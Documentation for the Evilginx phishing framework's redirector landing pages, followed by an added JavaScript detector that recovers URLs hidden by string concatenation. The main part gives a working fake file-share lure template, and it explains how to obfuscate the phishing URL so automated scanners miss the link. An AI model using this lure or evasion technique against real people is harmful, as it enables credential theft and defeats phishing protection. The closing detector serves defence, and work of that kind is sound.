
Redirectors

Redirectors are small websites that act as landing pages for your phishing links. When anyone clicks on your generated phishing link, they land on the redirector website. This website should redirect the visitor to the reverse-proxied phishing sign-in page, either automatically or by requiring some user interaction.

This middle step is crucial to protecting your phishing links from automated online scanners that flag phishing pages. A scanner will try to emulate a visit to your phishing link, and if it can't figure out how to get redirected to the phishing page, it will not be able to flag the link as dangerous.

You can either make your redirector use a technique that redirects the visitor automatically, which the scanner will have trouble emulating, or you can create a redirector that requires user interaction, like clicking a button, to proceed to the phishing page. It is up to you which one you use.

Redirectors reside by default under ./redirectors, in the root directory of Evilginx. Every redirector is a separate directory holding all the files required to properly render your landing page.

The file index.html or index.htm is always the main file, which is loaded when the redirector is about to be displayed to users.

Custom variables

Here is an example redirector index.html, which will render a button you need to press to get redirected to the phishing page.

<!doctype html>
<html lang="en">
<head>
<title>{from_name} ({from_email}) shared a file with you (1)</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body>
<div class="download">
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download "{filename}"</button>
</div>

<script>
function clickedDownload() {
window.location.assign({lure_url_js});
}
</script>

<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
</body>
</html>

As you can see, the redirector uses several different placeholders for custom variables:

  • from_name - Name of the person who is sharing the file
  • from_email - Email of the person who is sharing the file
  • filename - Filename of the shared file

All these custom variables can and should be customized while generating links for your lures. This gives your phishing landing page a personalized feel and lets you create your own redirectors with customizability in mind.

There are two custom variables that are hardcoded into Evilginx and will always be replaced with the URL of the main phishing page, allowing your redirector to know where to redirect the visitor:

  • lure_url_html - Turns into a phishing page URL:
https://www.linkedin.not-a-phish.com/?e=ue73er
  • lure_url_js - Turns into a phishing page URL as Javascript string obfuscated through concatenation:
'ht' + 't' + 'ps:' + '//' + 'w' + 'ww' + '.l' + 'i' + 'nke' + 'd' + 'in' + '.' + 'not' + '-a-' + 'p' + 'hi' + 'sh' + '.c' + 'om' + '/' + '?e' + '=ue' + '7' + '3er'

The latter is useful if you want to hide the redirect URL in your JavaScript code. The string is obfuscated differently with each page load. More string obfuscation options are coming in the future.

In the example above, you can see that redirection happens via JavaScript when the user clicks the download button, and that the script uses the lure_url_js placeholder, which is replaced with an obfuscated string containing the phishing page URL.
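Seen from the scanning side, the fragments change with each page load, but the string they evaluate to does not, so folding the literals statically recovers the redirect target without emulating the click. The following is an added example, not part of Evilginx or the original page; the sample HTML, the example.test domain and all function names are constructed for illustration.

```javascript
// Added example: recover URLs hidden by string-literal concatenation.
// SAMPLE_HTML is constructed for illustration; example.test is a placeholder.
const SAMPLE_HTML = `<button onclick="clickedDownload()">Download</button>
<script>
function clickedDownload() {
  window.location.assign('ht' + 't' + 'ps:' + '//' + 'w' + 'ww' + '.exa' + 'mple'
    + '.te' + 'st' + '/' + '?e' + '=ab' + 'c1' + '23');
}
</script>`;

// One single- or double-quoted literal, allowing backslash escapes.
const LITERAL = String.raw`(?:'(?:[^'\\\n]|\\.)*'|"(?:[^"\\\n]|\\.)*")`;
// Two or more literals joined by "+", the pattern shown for lure_url_js.
const CONCAT_RUN = new RegExp(`${LITERAL}(?:\\s*\\+\\s*${LITERAL})+`, 'g');
const ONE_LITERAL = new RegExp(LITERAL, 'g');

// Strip the quotes and drop the backslash from simple escapes (URLs need no more).
function unquote(literal) {
  return literal.slice(1, -1).replace(/\\(.)/g, '$1');
}

// Fold every concatenation run in a script into the string it evaluates to.
function foldConcatenations(script) {
  return (script.match(CONCAT_RUN) || []).map((run) => {
    const parts = run.match(ONE_LITERAL).map(unquote);
    return { value: parts.join(''), fragments: parts.length };
  });
}

// Scan inline <script> bodies and report folded strings that are URLs.
// The fragment count is kept because a heavily split URL is itself a signal.
function findHiddenRedirects(html) {
  const hits = [];
  for (const [, body] of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const { value, fragments } of foldConcatenations(body)) {
      if (/^https?:\/\//i.test(value)) hits.push({ url: value, fragments });
    }
  }
  return hits;
}

console.log(findHiddenRedirects(SAMPLE_HTML));
```

The recovered URL can then be passed to the same reputation and content checks a scanner applies to directly linked pages.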